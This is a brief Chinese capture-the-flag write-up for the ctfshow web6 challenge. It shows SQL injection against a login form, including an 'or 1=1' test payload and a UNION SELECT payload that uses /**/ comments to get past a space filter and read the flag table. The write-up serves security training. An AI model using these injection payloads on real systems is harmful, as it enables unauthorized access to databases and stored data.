ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
m0_477203101 小时前
Hercules-HTB-writeUp
web安全·网络安全
合才科技6 小时前
【要闻周报】网络安全与数据合规 12-31
安全·web安全
Par@ish6 小时前
【网络安全】Apache StreamPipes 严重漏洞使攻击者可夺取管理员控制权
安全·web安全·apache
汉堡包0016 小时前
【面试总结】--安服实习岗(2)
学习·安全·web安全·网络安全·面试
乾元13 小时前
Network-as-Code:把 HCIE / CCIE 实验脚本转为企业级 CI 工程化流程
运维·网络·人工智能·安全·web安全·ai·架构
小快说网安1 天前
从合规到发展:新《网络安全法》如何重塑企业安全建设逻辑
安全·web安全·等保测评
儒道易行1 天前
平凡的2025年终总结
网络·安全·web安全
m0_738120721 天前
渗透测试——靶机DC-6详细横向过程(Wordpress渗透)
服务器·网络·python·web安全·ssh·php
week_泽1 天前
Dvwa靶场搭建_错误汇总
web安全·网络安全·靶场·dvwa
week_泽1 天前
网安基础_1_补充_网络安全渗透测试学习笔记
笔记·学习·web安全